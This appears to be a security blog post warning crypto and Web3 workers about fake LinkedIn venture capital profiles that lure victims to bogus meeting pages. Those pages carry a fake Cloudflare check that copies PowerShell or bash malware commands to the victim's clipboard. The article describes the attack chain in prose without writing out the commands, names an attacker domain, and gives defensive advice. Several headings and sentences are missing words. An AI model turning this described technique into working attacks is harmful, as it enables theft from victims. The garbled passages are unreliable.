Menu

How Fake LinkedIn VCs Use ClickFix Malware to Target Web3 and Crypto Pros

, , , , , , , , 0

fb72ba2f-83b5-4a2e-a13a-b2efb1464d6a

How Use to Target Web3 and Crypto Pros

A dangerous new scam is hitting the crypto world. Bad actors are pretending to be venture capitalists on LinkedIn. They trick Web3 experts and crypto pros into clicking bad links. These links lead to malware that infects their computers. This attack uses a trick called ClickFix. It makes victims run harmful code without knowing.

If you work in blockchain, DeFi, or Web3, you need to know about this. Scammers create fake profiles. They promise big deals or jobs. But it’s all a trap to steal data or crypto. Let’s break down how it works and how to stay safe.

The Setup: Fake Profiles and Sweet-Talk Messages

The attack starts on LinkedIn. Scammers make profiles that look real. One example is “Mykhailo Hureiev,” who claims to be co-founder of SolidBit Capital. This is a fake VC firm. The profile has nice photos, a polished bio, and links to fake websites.

They send personal messages. These mention your recent posts, projects, or crypto work. It builds trust fast. Then, they offer partnerships, investments, or job talks in DeFi or blockchain.

Next, they push for a video call. They use Calendly links to set it up. But these links don’t go to real Zoom or Google Meet. They redirect to fake pages loaded with malware.

  • Fake companies spotted: SolidBit Capital, MegaBit, Lumax Capital.
  • All have pro-looking sites with AI-made team photos and fake histories.
  • Domains registered recently, like lumax.capital on February 2, 2026.

Behind it all? Domains trace to “Anatolli Bigdasch” in Boston, Massachusetts. Email: anatollibigdasch0717@gmail.com. This could be stolen or made-up info.

What is ? The Sneaky Clipboard Trick

is the star of this scam. When you click the video link, you see a fake page. It looks like a real event, like “The Digital Asset Conference III” or a copy of Hedgeweek site.

Over it sits a fake Cloudflare “I’m not a robot” box. It’s all fake HTML and CSS. No real Cloudflare. You click the checkbox to “verify.” Boom – JavaScript runs.

The script checks your browser’s User-Agent. It knows if you’re on Windows or macOS. Then, it copies a bad command to your clipboard. You think nothing happened. But now, if you paste it… trouble.

Windows Victims Get PowerShell Pain

On Windows, the clipboard gets a PowerShell command. It:

  • Hides the window.
  • Bypasses execution rules.
  • Runs a remote script in memory with Invoke-Expression.
  • Leaves no files for antivirus to find.

macOS Users Face Bash Nightmare

On Mac, it’s a bash one-liner. It:

  • Checks for Python 3. Installs Homebrew if missing.
  • Downloads a Python script from a bad server like hedgeweeks.online.
  • Runs it with nohup bash to keep going even if you close the terminal.

Researchers found two Mac binaries. One is huge (9.3 MB) with junk code to fool tools like Ghidra. The other is small (37.6 KB) but same evil logic. Both dodged VirusTotal scans for a long time.

Links to Big Threat Groups?

This feels like pro work. It matches tricks from UNC1069, a group linked to North Korea. They’ve hit crypto before with LinkedIn lures and social engineering.

UNC1069 has been around since 2018. They love targeting blockchain jobs and investments. But no hard proof here. It could be copycats chasing crypto cash.

The campaign kicked off early 2026. One victim, @0xbigdan on X, shared screens. The fake VC joined a real Google Meet, went quiet, then bailed when questioned.

Why Web3 Pros Are Perfect Targets

Crypto folks chase deals daily. New VCs pop up. LinkedIn is key for networking. Urgency makes you click fast. Scammers use this.

Red flags they push:

  1. Move chat off LinkedIn quick.
  2. Urgent calls about “hot opportunities.”
  3. Fake verification steps asking to paste commands.

How to Protect Yourself from and Fake VCs

Don’t be a victim. Follow these simple steps:

1. Vet Profiles and Companies

  • Check domain age with WHOIS.
  • Google the firm and people.
  • Look for AI-generated photos (reverse image search).
  • Ask mutual connections.

2. Handle Links Smart

  • Scan URLs with VirusTotal or URLScan.io before clicking.
  • Use a virtual machine or sandbox for tests.
  • Never paste clipboard commands into terminal or PowerShell.

3. Spot Social Engineering

  • No real VC rushes you off LinkedIn.
  • Verify via official channels.
  • Report suspicious profiles to LinkedIn.

4. Tech Defenses

  • Enable clipboard protection in antivirus.
  • Use endpoint detection tools.
  • Keep OS and browser updated.

Real services like Zoom or Cloudflare never ask you to run commands.

The Bigger Picture: Crypto Security in 2026

Attacks like this show crypto’s hot target status. As Web3 grows, so do risks. Scammers mix social tricks with tech smarts. Stay alert.

Share this if you know Web3 friends. Follow for more crypto security tips. What scams have you seen? Comment below.

Keywords: LinkedIn malware, ClickFix attack, Web3 phishing, crypto VC scam, blockchain security

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *